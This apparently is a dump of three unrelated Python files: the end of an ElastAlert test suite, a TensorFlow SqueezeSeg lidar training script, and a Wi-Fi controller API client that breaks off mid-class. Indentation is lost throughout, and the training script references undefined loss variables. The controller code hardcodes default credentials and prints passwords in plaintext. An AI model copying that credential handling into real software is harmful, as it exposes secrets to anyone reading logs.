assert mock_load.call_count == 2
mock_load.assert_any_call('rules/rule2.yaml', ea.conf)
mock_load.assert_any_call('rules/rule3.yaml', ea.conf)
# A new rule with a conflicting name wont load
new_hashes = copy.copy(new_hashes)
new_hashes.update({'rules/rule4.yaml': 'asdf'})
with mock.patch('elastalert.elastalert.get_rule_hashes') as mock_hashes:
with mock.patch('elastalert.elastalert.load_configuration') as mock_load:
with mock.patch.object(ea, 'send_notification_email') as mock_send:
mock_load.return_value = {'filter': [], 'name': 'rule3', 'new': 'stuff', 'rule_file': 'rules/rule4.yaml'}
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
mock_send.assert_called_once_with(exception=mock.ANY, rule_file='rules/rule4.yaml')
assert len(ea.rules) == 3
assert not any(['new' in rule for rule in ea.rules])
# A new rule with is_enabled=False wont load
new_hashes = copy.copy(new_hashes)
new_hashes.update({'rules/rule4.yaml': 'asdf'})
with mock.patch('elastalert.elastalert.get_rule_hashes') as mock_hashes:
with mock.patch('elastalert.elastalert.load_configuration') as mock_load:
mock_load.return_value = {'filter': [], 'name': 'rule4', 'new': 'stuff', 'is_enabled': False, 'rule_file': 'rules/rule4.yaml'}
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
assert len(ea.rules) == 3
assert not any(['new' in rule for rule in ea.rules])
# An old rule which didn't load gets reloaded
new_hashes = copy.copy(new_hashes)
new_hashes['rules/rule4.yaml'] = 'qwerty'
with mock.patch('elastalert.elastalert.get_rule_hashes') as mock_hashes:
with mock.patch('elastalert.elastalert.load_configuration') as mock_load:
mock_load.return_value = {'filter': [], 'name': 'rule4', 'new': 'stuff', 'rule_file': 'rules/rule4.yaml'}
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
assert len(ea.rules) == 4
def test_strf_index(ea):
""" Test that the get_index function properly generates indexes spanning days """
ea.rules[0]['index'] = 'logstash-%Y.%m.%d'
ea.rules[0]['use_strftime_index'] = True
# Test formatting with times
start = ts_to_dt('2015-01-02T12:34:45Z')
end = ts_to_dt('2015-01-02T16:15:14Z')
assert ea.get_index(ea.rules[0], start, end) == 'logstash-2015.01.02'
end = ts_to_dt('2015-01-03T01:02:03Z')
assert set(ea.get_index(ea.rules[0], start, end).split(',')) == set(['logstash-2015.01.02', 'logstash-2015.01.03'])
# Test formatting for wildcard
assert ea.get_index(ea.rules[0]) == 'logstash-*'
ea.rules[0]['index'] = 'logstash-%Y.%m'
assert ea.get_index(ea.rules[0]) == 'logstash-*'
ea.rules[0]['index'] = 'logstash-%Y.%m-stuff'
assert ea.get_index(ea.rules[0]) == 'logstash-*-stuff'
def test_count_keys(ea):
ea.rules[0]['timeframe'] = datetime.timedelta(minutes=60)
ea.rules[0]['top_count_keys'] = ['this', 'that']
ea.rules[0]['type'].matches = {'@timestamp': END}
ea.rules[0]['doc_type'] = 'blah'
buckets = [{'aggregations': {'filtered': {'counts': {'buckets': [{'key': 'a', 'doc_count': 10}, {'key': 'b', 'doc_count': 5}]}}}},
{'aggregations': {'filtered': {'counts': {'buckets': [{'key': 'd', 'doc_count': 10}, {'key': 'c', 'doc_count': 12}]}}}}]
ea.current_es.search.side_effect = buckets
counts = ea.get_top_counts(ea.rules[0], START, END, ['this', 'that'])
calls = ea.current_es.search.call_args_list
assert calls[0][1]['search_type'] == 'count'
assert calls[0][1]['body']['aggs']['filtered']['aggs']['counts']['terms'] == {'field': 'this', 'size': 5}
assert counts['top_events_this'] == {'a': 10, 'b': 5}
assert counts['top_events_that'] == {'d': 10, 'c': 12}
def test_exponential_realert(ea):
ea.rules[0]['exponential_realert'] = datetime.timedelta(days=1) # 1 day ~ 10 * 2**13 seconds
ea.rules[0]['realert'] = datetime.timedelta(seconds=10)
until = ts_to_dt('2015-03-24T00:00:00')
ts5s = until + datetime.timedelta(seconds=5)
ts15s = until + datetime.timedelta(seconds=15)
ts1m = until + datetime.timedelta(minutes=1)
ts5m = until + datetime.timedelta(minutes=5)
ts4h = until + datetime.timedelta(hours=4)
test_values = [(ts5s, until, 0), # Exp will increase to 1, 10*2**0 = 10s
(ts15s, until, 0), # Exp will stay at 0, 10*2**0 = 10s
(ts15s, until, 1), # Exp will increase to 2, 10*2**1 = 20s
(ts1m, until, 2), # Exp will decrease to 1, 10*2**2 = 40s
(ts1m, until, 3), # Exp will increase to 4, 10*2**3 = 1m20s
(ts5m, until, 1), # Exp will lower back to 0, 10*2**1 = 20s
(ts4h, until, 9), # Exp will lower back to 0, 10*2**9 = 1h25m
(ts4h, until, 10), # Exp will lower back to 9, 10*2**10 = 2h50m
(ts4h, until, 11)] # Exp will increase to 12, 10*2**11 = 5h
results = (1, 0, 2, 1, 4, 0, 0, 9, 12)
next_res = iter(results)
for args in test_values:
ea.silence_cache[ea.rules[0]['name']] = (args[1], args[2])
next_alert, exponent = ea.next_alert_time(ea.rules[0], ea.rules[0]['name'], args[0])
assert exponent == next_res.next()
def test_wait_until_responsive(ea):
"""Unblock as soon as ElasticSearch becomes responsive."""
# Takes a while before becoming responsive.
ea.writeback_es.indices.exists.side_effect = [
ConnectionError(), # ES is not yet responsive.
False, # index does not yet exist.
True,
]
clock = mock.MagicMock()
clock.side_effect = [0.0, 1.0, 2.0, 3.0, 4.0]
timeout = datetime.timedelta(seconds=3.5)
with mock.patch('time.sleep') as sleep:
ea.wait_until_responsive(timeout=timeout, clock=clock)
# Sleep as little as we can.
sleep.mock_calls == [
mock.call(1.0),
]
def test_wait_until_responsive_timeout_es_not_available(ea, capsys):
"""Bail out if ElasticSearch doesn't (quickly) become responsive."""
# Never becomes responsive :-)
ea.writeback_es.ping.return_value = False
ea.writeback_es.indices.exists.return_value = False
clock = mock.MagicMock()
clock.side_effect = [0.0, 1.0, 2.0, 3.0]
timeout = datetime.timedelta(seconds=2.5)
with mock.patch('time.sleep') as sleep:
with pytest.raises(SystemExit) as exc:
ea.wait_until_responsive(timeout=timeout, clock=clock)
assert exc.value.code == 1
# Ensure we get useful diagnostics.
output, errors = capsys.readouterr()
assert 'Could not reach ElasticSearch at "es:14900".' in errors
# Slept until we passed the deadline.
sleep.mock_calls == [
mock.call(1.0),
mock.call(1.0),
mock.call(1.0),
]
def test_wait_until_responsive_timeout_index_does_not_exist(ea, capsys):
"""Bail out if ElasticSearch doesn't (quickly) become responsive."""
# Never becomes responsive :-)
ea.writeback_es.ping.return_value = True
ea.writeback_es.indices.exists.return_value = False
clock = mock.MagicMock()
clock.side_effect = [0.0, 1.0, 2.0, 3.0]
timeout = datetime.timedelta(seconds=2.5)
with mock.patch('time.sleep') as sleep:
with pytest.raises(SystemExit) as exc:
ea.wait_until_responsive(timeout=timeout, clock=clock)
assert exc.value.code == 1
# Ensure we get useful diagnostics.
output, errors = capsys.readouterr()
assert 'Writeback index "wb" does not exist, did you run `elastalert-create-index`?' in errors
# Slept until we passed the deadline.
sleep.mock_calls == [
mock.call(1.0),
mock.call(1.0),
mock.call(1.0),
]
def test_stop(ea):
""" The purpose of this test is to make sure that calling ElastAlerter.stop() will break it
out of a ElastAlerter.start() loop. This method exists to provide a mechanism for running
ElastAlert with threads and thus must be tested with threads. mock_loop verifies the loop
is running and will call stop after several iterations. """
# Exit the thread on the fourth iteration
def mock_loop():
for i in range(3):
assert ea.running
yield
ea.stop()
with mock.patch.object(ea, 'sleep_for', return_value=None):
with mock.patch.object(ea, 'run_all_rules') as mock_run:
mock_run.side_effect = mock_loop()
start_thread = threading.Thread(target=ea.start)
# Set as daemon to prevent a failed test from blocking exit
start_thread.daemon = True
start_thread.start()
# Give it a few seconds to run the loop
start_thread.join(5)
assert not ea.running
assert not start_thread.is_alive()
assert mock_run.call_count == 4
def test_notify_email(ea):
mock_smtp = mock.Mock()
ea.rules[0]['notify_email'] = ['foo@foo.foo', 'bar@bar.bar']
with mock.patch('elastalert.elastalert.SMTP') as mock_smtp_f:
mock_smtp_f.return_value = mock_smtp
# Notify_email from rules, array
ea.send_notification_email('omg', rule=ea.rules[0])
assert set(mock_smtp.sendmail.call_args_list[0][0][1]) == set(ea.rules[0]['notify_email'])
# With ea.notify_email
ea.notify_email = ['baz@baz.baz']
ea.send_notification_email('omg', rule=ea.rules[0])
assert set(mock_smtp.sendmail.call_args_list[1][0][1]) == set(['baz@baz.baz'] + ea.rules[0]['notify_email'])
# With ea.notify email but as single string
ea.rules[0]['notify_email'] = 'foo@foo.foo'
ea.send_notification_email('omg', rule=ea.rules[0])
assert set(mock_smtp.sendmail.call_args_list[2][0][1]) == set(['baz@baz.baz', 'foo@foo.foo'])
# None from rule
ea.rules[0].pop('notify_email')
ea.send_notification_email('omg', rule=ea.rules[0])
assert set(mock_smtp.sendmail.call_args_list[3][0][1]) == set(['baz@baz.baz'])
def test_uncaught_exceptions(ea):
e = Exception("Errors yo!")
# With disabling set to false
ea.disable_rules_on_error = False
ea.handle_uncaught_exception(e, ea.rules[0])
assert len(ea.rules) == 1
assert len(ea.disabled_rules) == 0
# With disabling set to true
ea.disable_rules_on_error = True
ea.handle_uncaught_exception(e, ea.rules[0])
assert len(ea.rules) == 0
assert len(ea.disabled_rules) == 1
# Changing the file should re-enable it
ea.rule_hashes = {'blah.yaml': 'abc'}
new_hashes = {'blah.yaml': 'def'}
with mock.patch('elastalert.elastalert.get_rule_hashes') as mock_hashes:
with mock.patch('elastalert.elastalert.load_configuration') as mock_load:
mock_load.side_effect = [ea.disabled_rules[0]]
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
assert len(ea.rules) == 1
assert len(ea.disabled_rules) == 0
# Notify email is sent
ea.notify_email = 'qlo@example.com'
with mock.patch.object(ea, 'send_notification_email') as mock_email:
ea.handle_uncaught_exception(e, ea.rules[0])
assert mock_email.call_args_list[0][1] == {'exception': e, 'rule': ea.disabled_rules[0]}
def test_get_top_counts_handles_no_hits_returned(ea):
with mock.patch.object(ea, 'get_hits_terms') as mock_hits:
mock_hits.return_value = None
rule = ea.rules[0]
starttime = datetime.datetime.now() - datetime.timedelta(minutes=10)
endtime = datetime.datetime.now()
keys = ['foo']
all_counts = ea.get_top_counts(rule, starttime, endtime, keys)
assert all_counts == {'top_events_foo': {}}
def test_remove_old_events(ea):
now = ts_now()
minute = datetime.timedelta(minutes=1)
ea.rules[0]['processed_hits'] = {'foo': now - minute,
'bar': now - minute * 5,
'baz': now - minute * 15}
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=10)
# With a query delay, only events older than 20 minutes will be removed (none)
ea.rules[0]['query_delay'] = datetime.timedelta(minutes=10)
ea.remove_old_events(ea.rules[0])
assert len(ea.rules[0]['processed_hits']) == 3
# With no query delay, the 15 minute old event will be removed
ea.rules[0].pop('query_delay')
ea.remove_old_events(ea.rules[0])
assert len(ea.rules[0]['processed_hits']) == 2
assert 'baz' not in ea.rules[0]['processed_hits']
def test_query_with_whitelist_filter_es(ea):
ea.rules[0]['_source_enabled'] = False
ea.rules[0]['five'] = False
ea.rules[0]['filter'] = [{'query_string': {'query': 'baz'}}]
ea.rules[0]['compare_key'] = "username"
ea.rules[0]['whitelist'] = ['xudan1', 'xudan12', 'aa1', 'bb1']
new_rule = copy.copy(ea.rules[0])
ea.init_rule(new_rule, True)
assert 'NOT username:"xudan1" AND NOT username:"xudan12" AND NOT username:"aa1"' \
in new_rule['filter'][-1]['query']['query_string']['query']
def test_query_with_whitelist_filter_es_five(ea):
ea.es_version = '6.2'
ea.rules[0]['_source_enabled'] = False
ea.rules[0]['filter'] = [{'query_string': {'query': 'baz'}}]
ea.rules[0]['compare_key'] = "username"
ea.rules[0]['whitelist'] = ['xudan1', 'xudan12', 'aa1', 'bb1']
new_rule = copy.copy(ea.rules[0])
ea.init_rule(new_rule, True)
assert 'NOT username:"xudan1" AND NOT username:"xudan12" AND NOT username:"aa1"' in new_rule['filter'][-1]['query_string']['query']
def test_query_with_blacklist_filter_es(ea):
ea.rules[0]['_source_enabled'] = False
ea.rules[0]['filter'] = [{'query_string': {'query': 'baz'}}]
ea.rules[0]['compare_key'] = "username"
ea.rules[0]['blacklist'] = ['xudan1', 'xudan12', 'aa1', 'bb1']
new_rule = copy.copy(ea.rules[0])
ea.init_rule(new_rule, True)
assert 'username:"xudan1" OR username:"xudan12" OR username:"aa1"' in new_rule['filter'][-1]['query']['query_string']['query']
def test_query_with_blacklist_filter_es_five(ea):
ea.es_version = '6.2'
ea.rules[0]['_source_enabled'] = False
ea.rules[0]['filter'] = [{'query_string': {'query': 'baz'}}]
ea.rules[0]['compare_key'] = "username"
ea.rules[0]['blacklist'] = ['xudan1', 'xudan12', 'aa1', 'bb1']
new_rule = copy.copy(ea.rules[0])
ea.init_rule(new_rule, True)
assert 'username:"xudan1" OR username:"xudan12" OR username:"aa1"' in new_rule['filter'][-1]['query_string']['query']
|
train.py
|
# BSD 3-Clause License
#
# Copyright (c) 2019, FPAI
# Copyright (c) 2019, SeriouslyHAO
# Copyright (c) 2019, xcj2019
# Copyright (c) 2019, Leonfirst
#
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Train"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os.path
import sys
import time
import math
import numpy as np
from six.moves import xrange
import tensorflow as tf
import threading
from config import *
from imdb import kitti
from utils.util import *
from nets import *
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('dataset', 'KITTI',
"""Currently only support KITTI dataset.""")
tf.app.flags.DEFINE_string('data_path', '', """Root directory of data""")
tf.app.flags.DEFINE_string('image_set', 'train',
""" Can be train, trainval, val, or test""")
tf.app.flags.DEFINE_string('train_dir', '/home/dink/DEEPLEARNING/DL_SQUEEZESEG/output',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_integer('max_steps', 1000000,
"""Maximum number of batches to run.""")
tf.app.flags.DEFINE_string('net', 'squeezeSeg',
"""Neural net architecture. """)
tf.app.flags.DEFINE_string('pretrained_model_path', '',
"""Path to the pretrained model.""")
tf.app.flags.DEFINE_integer('summary_step', 50,
"""Number of steps to save summary.""")
tf.app.flags.DEFINE_integer('checkpoint_step', 1000,
"""Number of steps to save summary.""")
tf.app.flags.DEFINE_string('gpu', '0', """gpu id.""")
def train():
"""Train SqueezeSeg model"""
assert FLAGS.dataset == 'KITTI', \
'Currently only support KITTI dataset'
os.environ['CUDA_VISIBLE_DEVICES'] = FLAGS.gpu
with tf.Graph().as_default():
assert FLAGS.net == 'squeezeSeg', \
'Selected neural net architecture not supported: {}'.format(FLAGS.net)
if FLAGS.net == 'squeezeSeg':
mc = kitti_squeezeSeg_config()
mc.PRETRAINED_MODEL_PATH = FLAGS.pretrained_model_path
model = SqueezeSeg(mc)
imdb = kitti(FLAGS.image_set, FLAGS.data_path, mc)
# save model size, flops, activations by layers
with open(os.path.join(FLAGS.train_dir, 'model_metrics.txt'), 'w') as f:
f.write('Number of parameter by layer:\n')
count = 0
for c in model.model_size_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
count = 0
f.write('\nActivation size by layer:\n')
for c in model.activation_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
count = 0
f.write('\nNumber of flops by layer:\n')
for c in model.flop_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
f.close()
print ('Model statistics saved to {}.'.format(
os.path.join(FLAGS.train_dir, 'model_metrics.txt')))
def enqueue(sess, coord):
with coord.stop_on_exception():
while not coord.should_stop():
# read batch input
lidar_per_batch, lidar_mask_per_batch, label_per_batch,\
weight_per_batch = imdb.read_batch()
feed_dict = {
model.ph_keep_prob: mc.KEEP_PROB,
model.ph_lidar_input: lidar_per_batch,
model.ph_lidar_mask: lidar_mask_per_batch,
model.ph_label: label_per_batch,
model.ph_loss_weight: weight_per_batch,
}
sess.run(model.enqueue_op, feed_dict=feed_dict)
saver = tf.train.Saver(tf.all_variables())
summary_op = tf.summary.merge_all()
init = tf.initialize_all_variables()
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
sess.run(init)
summary_writer = tf.summary.FileWriter(FLAGS.train_dir, sess.graph)
# coord = tf.train.Coordinator()
# enq_threads = []
# for _ in range(mc.NUM_ENQUEUE_THREAD):
# eqth = threading.Thread(target=enqueue, args=[sess, coord])
# eqth.start()
# enq_threads.append(eqth)
#
#
#
run_options = tf.RunOptions(timeout_in_ms=60000)
# try:
if True:
for step in xrange(FLAGS.max_steps):
start_time = time.time()
lidar_per_batch, lidar_mask_per_batch, label_per_batch, \
weight_per_batch = imdb.read_batch()
if step % FLAGS.summary_step == 0 or step == FLAGS.max_steps-1:
print('---------------------------------------------------------------------------')
print('step',step)
# data_lidar_per_batch = tf.constant(data_lidar_per_batch)
# data_lidar_mask_per_batch = tf.constant(data_lidar_mask_per_batch)
# data_label_per_batch = tf.constant(data_label_per_batch)
# data_weight_per_batch = tf.constant(data_weight_per_batch)
# data_lidar_per_batch=tf.cast(data_lidar_per_batch, tf.float32)
# print('data_lidar_per_batch.shape',data_lidar_per_batch.shape)
# print('data_lidar_per_batch.dtype',data_lidar_per_batch.dtype)
# data_lidar_mask_per_batch=tf.cast(data_lidar_mask_per_batch, tf.float32)
# data_label_per_batch=tf.cast(data_label_per_batch, tf.float32)
# data_weight_per_batch=tf.cast(data_weight_per_batch, tf.float32)
# op_list = [
# data_lidar_per_batch, data_lidar_mask_per_batch, data_label_per_batch, model.train_op,
# model.loss, model.pred_cls, summary_op
# ]
# data_lidar_per_batch.shape(32, 64, 512, 5)
# data_lidar_per_batch.dtype < dtype: 'float32' >
# model.lidar_input(32, 64, 512, 5)
# model.lidar_input.dtype < dtype: 'float32' >
op_list = [
model.lidar_input, model.lidar_mask, model.label, model.train_op,
model.loss, model.pred_cls, summary_op
]
# print('model.lidar_input',model.lidar_input.shape)
# print('model.lidar_input.dtype',model.lidar_input.dtype)
# lidar_per_batch, lidar_mask_per_batch, label_per_batch, _ \
# = imdb.read_batch(shuffle=False)
# pred_cls = sess.run(
# model.pred_cls,
# feed_dict={
# model.lidar_input: lidar_per_batch,
# model.keep_prob: 1.0,
# model.lidar_mask: lidar_mask_per_batch
# }
# )
lidar_per_batch, lidar_mask_per_batch, label_per_batch, \
_, loss_value, pred_cls, summary_str = sess.run(op_list,
feed_dict={
model.keep_prob: 0.5,
model.lidar_input: lidar_per_batch,
model.lidar_mask: lidar_mask_per_batch,
model.label: label_per_batch,
model.loss_weight: weight_per_batch
})
# options=run_options)
label_image = visualize_seg(label_per_batch[:6, :, :], mc)
pred_image = visualize_seg(pred_cls[:6, :, :], mc)
# Run evaluation on the batch
ious, _, _, _ = evaluate_iou(
label_per_batch, pred_cls*np.squeeze(lidar_mask_per_batch),
mc.NUM_CLASS)
feed_dict = {}
# Assume that class-0 is the background class
for i in range(1, mc.NUM_CLASS):
feed_dict[model.iou_summary_placeholders[i]] = ious[i]
iou_summary_list = sess.run(model.iou_summary_ops[1:], feed_dict)
# Run visualization
viz_op_list = [model.show_label, model.show_depth_img, model.show_pred]
viz_summary_list = sess.run(
viz_op_list,
feed_dict={
model.depth_image_to_show: lidar_per_batch[:6, :, :, [4]],
model.label_to_show: label_image,
model.pred_image_to_show: pred_image,
}
)
# Add summaries
summary_writer.add_summary(summary_str, step)
for sum_str in iou_summary_list:
summary_writer.add_summary(sum_str, step)
for viz_sum in viz_summary_list:
summary_writer.add_summary(viz_sum, step)
# force tensorflow to synchronise summaries
summary_writer.flush()
else:
_, loss_value = sess.run(
[model.train_op, model.loss],feed_dict={
model.keep_prob: 0.5,
model.lidar_input: lidar_per_batch,
model.lidar_mask: lidar_mask_per_batch,
model.label: label_per_batch,
model.loss_weight: weight_per_batch
})
duration = time.time() - start_time
assert not np.isnan(loss_value), \
'Model diverged. Total loss: {}, conf_loss: {}, bbox_loss: {}, ' \
'class_loss: {}'.format(loss_value, conf_loss, bbox_loss,
class_loss)
if step % 10 == 0:
num_images_per_step = mc.BATCH_SIZE
images_per_sec = num_images_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.2f (%.1f images/sec; %.3f '
'sec/batch)')
print (format_str % (datetime.now(), step, loss_value,
images_per_sec, sec_per_batch))
sys.stdout.flush()
# Save the model checkpoint periodically.
if step % FLAGS.checkpoint_step == 0 or step == FLAGS.max_steps-1:
checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=step)
# except Exception, e:
# print('e',e)
# sys.exit()
# coord.request_stop(e)
# finally:
# coord.request_stop()
# sess.run(model.q.close(cancel_pending_enqueues=True))
# coord.join(enq_threads)
def main(argv=None): # pylint: disable=unused-argument
if tf.gfile.Exists(FLAGS.train_dir):
tf.gfile.DeleteRecursively(FLAGS.train_dir)
tf.gfile.MakeDirs(FLAGS.train_dir)
train()
if __name__ == '__main__':
tf.app.run()
|
controller.py
|
# !/usr/local/lib64/python3.8
"""
Controller Library
1. controller_data/sdk_base_url
2. login credentials
"""
import base64
import datetime
import json
import re
import ssl
import time
import urllib
import requests
import swagger_client
from swagger_client import FirmwareManagementApi
from swagger_client import EquipmentGatewayApi
from bs4 import BeautifulSoup
import threading
class ConfigureController:
def __init__(self):
self.configuration = swagger_client.Configuration()
def set_credentials(self, controller_data=None):
if dict(controller_data).keys().__contains__("username") and dict(controller_data).keys().__contains__(
"password"):
self.configuration.username = controller_data["username"]
self.configuration.password = controller_data["password"]
print("Login Credentials set to custom: \n user_id: %s\n password: %s\n" % (controller_data["username"],
controller_data["password"]))
return True
else:
self.configuration.username = "support@example.com"
self.configuration.password = "support"
print("Login Credentials set to default: \n user_id: %s\n password: %s\n" % ("support@example.com",
"support"))
return False
def select_controller_data(self, controller_data=None):
if dict(controller_data).keys().__contains__("url") is None:
print("No controller_data Selected")
exit()
self.sdk_base_url = controller_data["url"]
self.configuration.host = self.sdk_base_url
print("controller_data Selected: %s\n SDK_BASE_URL: %s\n" % (controller_data["url"], self.sdk_base_url))
return True
def set_sdk_base_url(self, sdk_base_url=None):
if sdk_base_url is None:
print("URL is None")
exit()
self.configuration.host = sdk_base_url
return True
"""
Library for cloud_controller_tests generic usages, it instantiate the bearer and credentials.
It provides the connectivity to the cloud.
Instantiate the Object by providing the controller_data=controller_url, customer_id=2
"""
class Controller(ConfigureController):
"""
constructor for cloud_controller_tests library
"""
def __init__(self, controller_data=None, customer_id=None):
super().__init__()
self.controller_data = controller_data
self.customer_id = customer_id
if customer_id is None:
self.customer_id = 2
print("Setting to default Customer ID 2")
#
# Setting the Controller Client Configuration
self.select_controller_data(controller_data=controller_data)
self.set_credentials(controller_data=controller_data)
self.configuration.refresh_api_key_hook = self.get_bearer_token
# Connecting to Controller
self.api_client = swagger_client.ApiClient(self.configuration)
self.login_client = swagger_client.LoginApi(api_client=self.api_client)
self.bearer = False
self.disconnect = False
# Token expiry in seconds
self.token_expiry = 1000
self.token_timestamp = time.time()
try:
self.bearer = self.get_bearer_token()
# t1 = threading.Thread(target=self.refresh_instance)
# t1.start()
self.api_client.default_headers['Authorization'] = "Bearer " + self.bearer._access_token
self.status_client = swagger_client.StatusApi(api_client=self.api_client)
self.equipment_client = swagger_client.EquipmentApi(self.api_client)
self.profile_client = swagger_client.ProfileApi(self.api_client)
self.api_client.configuration.api_key_prefix = {
"Authorization": "Bearer " + self.bearer._access_token
}
self.api_client.configuration.refresh_api_key_hook = self.refresh_instance
self.ping_response = self.portal_ping()
print("Portal details :: \n", self.ping_response)
except Exception as e:
self.bearer = False
print(e)
print("Connected to Controller Server")
def get_bearer_token(self):
request_body = {
"userId": self.configuration.username,
"password": self.configuration.password
}
return self.login_client.get_access_token(request_body)
def refresh_instance(self):
# Refresh token 10 seconds before it's expiry
if time.time() - self.token_timestamp > self.token_expiry - 10:
self.token_timestamp = time.time()
print("Refreshing the controller API token")
self.disconnect_Controller()
self.api_client = swagger_client.ApiClient(self.configuration)
self.login_client = swagger_client.LoginApi(api_client=self.api_client)
self.bearer = self.get_bearer_token()
self.api_client.default_headers['Authorization'] = "Bearer " + self.bearer._access_token
self.status_client = swagger_client.StatusApi(api_client=self.api_client)
self.equipment_client = swagger_client.EquipmentApi(self.api_client)
self.profile_client = swagger_client.ProfileApi(self.api_client)
self.api_client.configuration.api_key_prefix = {
"Authorization": "Bearer " + self.bearer._access_token
}
self.api_client.configuration.refresh_api_key_hook = self.refresh_instance
self.ping_response = self.portal_ping()
print("Portal details :: \n", self.ping_response)
if self.ping_response._application_name != 'PortalServer':
print("Server not Reachable")
exit()
print("Connected to Controller Server")
def portal_ping(self):
self.refresh_instance()
return self.login_client.portal_ping()
def disconnect_Controller(self):
self.refresh_instance()
self.disconnect = True
self.api_client.__del__()
# Returns a List of All the Equipments that are available in the cloud instances
def get_equipment_by_customer_id(self, max_items=10):
self.refresh_instance()
pagination_context = """{
"model_type": "PaginationContext",
"maxItemsPerPage": """ + str(max_items) + """
}"""
self.refresh_instance()
equipment_data = self.equipment_client.get_equipment_by_customer_id(customer_id=self.customer_id,
pagination_context=pagination_context)
return equipment_data._items
# check if equipment with the given equipment_id is available in cloud instance or not
def validate_equipment_availability(self, equipment_id=None):
self.refresh_instance()
data = self.get_equipment_by_customer_id()
for i in data:
if i._id == equipment_id:
return i._id
return -1
# Need to be added in future
def request_ap_reboot(self):
self.refresh_instance()
pass
# Get the equipment id, of a equipment with a serial number
def get_equipment_id(self, serial_number=None):
self.refresh_instance()
equipment_data = self.get_equipment_by_customer_id(max_items=100)
# print(len(equipment_data))
for equipment in equipment_data:
if equipment._serial == serial_number:
return equipment._id
# Get the equipment model name of a given equipment_id
def get_model_name(self, equipment_id=None):
self.refresh_instance()
if equipment_id is None:
return None
self.refresh_instance()
data = self.equipment_client.get_equipment_by_id(equipment_id=equipment_id)
print(str(data._details._equipment_model))
return str(data._details._equipment_model)
# Needs Bug fix from swagger code generation side
def get_ap_firmware_new_method(self, equipment_id=None):
self.refresh_instance()
response = self.status_client.get_status_by_customer_equipment(customer_id=self.customer_id,
equipment_id=equipment_id)
print(response[2])
# Old Method, will be depreciated in future
def get_ap_firmware_old_method(self, equipment_id=None):
self.refresh_instance()
url = self.configuration.host + "/portal/status/forEquipment?customerId=" + str(
self.customer_id) + "&equipmentId=" + str(equipment_id)
payload = {}
headers = self.configuration.api_key_prefix
response = requests.request("GET", url, headers=headers, data=payload)
if response.status_code == 200:
status_data = response.json()
# print(status_data)
try:
current_ap_fw = status_data[2]['details']['reportedSwVersion']
# print(current_ap_fw)
return current_ap_fw
except Exception as e:
print(e)
current_ap_fw = "error"
return e
else:
return False
"""
Profile Utilities
"""
def get_current_profile_on_equipment(self, equipment_id=None):
self.refresh_instance()
default_equipment_data = self.equipment_client.get_equipment_by_id(equipment_id=equipment_id, async_req=False)
return default_equipment_data._profile_id
# Get the ssid's that are used by the equipment
def get_ssids_on_equipment(self, equipment_id=None):
self.refresh_instance()
profile_id = self.get_current_profile_on_equipment(equipment_id=equipment_id)
all_profiles = self.profile_client.get_profile_with_children(profile_id=profile_id)
ssid_name_list = []
for i in all_profiles:
if i._profile_type == "ssid":
ssid_name_list.append(i._details['ssid'])
return all_profiles
# Get the child ssid profiles that are used by equipment ap profile of given profile id
def get_ssid_profiles_from_equipment_profile(self, profile_id=None):
self.refresh_instance()
equipment_ap_profile = self.profile_client.get_profile_by_id(profile_id=profile_id)
ssid_name_list = []
child_profile_ids = equipment_ap_profile.child_profile_ids
for i in child_profile_ids:
profile = self.profile_client.get_profile_by_id(profile_id=i)
if profile._profile_type == "ssid":
ssid_name_list.append(profile._details['ssid'])
return ssid_name_list
"""
Library for Profile Utility, Creating Profiles and Pushing and Deleting them
Steps to create a Profile on Controller:
create a RF Profile
create a Radius Profile
create ssid profiles, and add the radius profile in them, if needed (only used by eap ssid's)
create equipment_ap profile, and add the rf profile and ssid profiles
Now using push profile method, equipment_ap profile will be pushed to an AP of given equipment_id
"""
class ProfileUtility:
"""
constructor for Access Point Utility library
"""
def __init__(self, sdk_client=None, controller_data=None, customer_id=None):
if sdk_client is None:
sdk_client = Controller(controller_data=controller_data, customer_id=customer_id)
self.sdk_client = sdk_client
self.sdk_client.refresh_instance()
self.profile_client = swagger_client.ProfileApi(api_client=self.sdk_client.api_client)
self.profile_creation_ids = {
"ssid": [],
